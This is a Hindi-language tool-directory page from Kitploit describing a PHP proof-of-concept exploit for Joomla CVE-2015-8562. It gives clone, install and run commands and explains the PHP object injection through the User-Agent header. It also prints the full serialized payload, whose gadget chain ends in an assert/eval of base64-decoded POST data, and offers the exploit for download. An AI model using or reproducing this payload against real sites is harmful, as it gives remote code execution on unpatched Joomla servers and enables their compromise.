Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Joomla-CVE-2015-8562-PHP-POC — Joomla के CVE-2015-8562 भेद्यता के लिए एक अवधारणा प्रमाण | Kitploit
उपकरण/GitHubGitHub/robinhoutevelts/joomla-cve-2015-8562-php-poc
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubrobinhoutevelts/joomla-cve-2015-8562-php-poc

Joomla-CVE-2015-8562-PHP-POC

Joomla के CVE-2015-8562 भेद्यता के लिए एक अवधारणा प्रमाण

रिपॉजिटरी देखें
2310 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Joomla-CVE-2015-8562-PHP-POC

Joomla के CVE-2015-8562 भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट

Preview

परिचय

यह PoC Gary के python कार्यान्वयन की लगभग 1:1 प्रतिलिपि है, जो exploit-db पर होस्ट की गई है।

इसका उपयोग करें

इसे स्थापित करना बहुत आसान है:

root@kitploit:~
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install

एक बार composer सब कुछ स्थापित कर दे, तो आपको exploit.php में $target बदलना होगा।

उसके बाद आप तैयार हैं:

root@kitploit:~
php exploit.php

CVE-2015-8562

दिसंबर 2015 में Joomla में एक भेद्यता पाई गई थी। यह दूरस्थ हमलावरों को PHP ऑब्जेक्ट इंजेक्शन हमले करने और HTTP User-Agent हैडर के माध्यम से मनमाना PHP कोड निष्पादित करने की अनुमति देती है।

यह भेद्यता Joomla के सभी संस्करणों को प्रभावित करती है। v1.5.x, v2.5x और v3.x के लिए एक पैच पहले ही जारी किया जा चुका है।

यदि आप PHP >= 5.4.45, >= 5.5.29 या >= 5.6.13 चला रहे हैं, तो आप सुरक्षित हैं क्योंकि यह शोषण CVE-2015-6835 का भी उपयोग करता है।

PatrolServer के Nikos Verschore ने एक बहुत विस्तृत ब्लॉग पोस्ट लिखा था और इस भेद्यता को समझने में बहुत मददगार थे। आप उनके मिनी-स्कैनर का मुफ्त में उपयोग कर सकते हैं ताकि जाँच सकें कि आपकी साइट जोखिम में है या नहीं।

वास्तविक शोषण

यह भेजा गया User-Agent हैडर इस तरह दिखता है:

root@kitploit:~
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
  s:4:"\0\0\0a";
  O:17:"JSimplepieFactory":0:{}
  s:21:"\0\0\0disconnectHandlers";
  a:1:{
    i:0;
    a:2:{
      i:0;
      O:9:"SimplePie":5:{
        s:8:"sanitize";
        O:20:"JDatabaseDriverMysql":0:{}
        s:5:"cache";
        b:1;
        s:19:"cache_name_function";
        s:6:"assert";
        s:10:"javascript";
        i:9999;
        s:8:"feed_url";
        s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
      }
      i:1;
      s:4:"init";
    }
  }
  s:13:"\0\0\0connection";
  i:1;
}
टूल डाउनलोड करें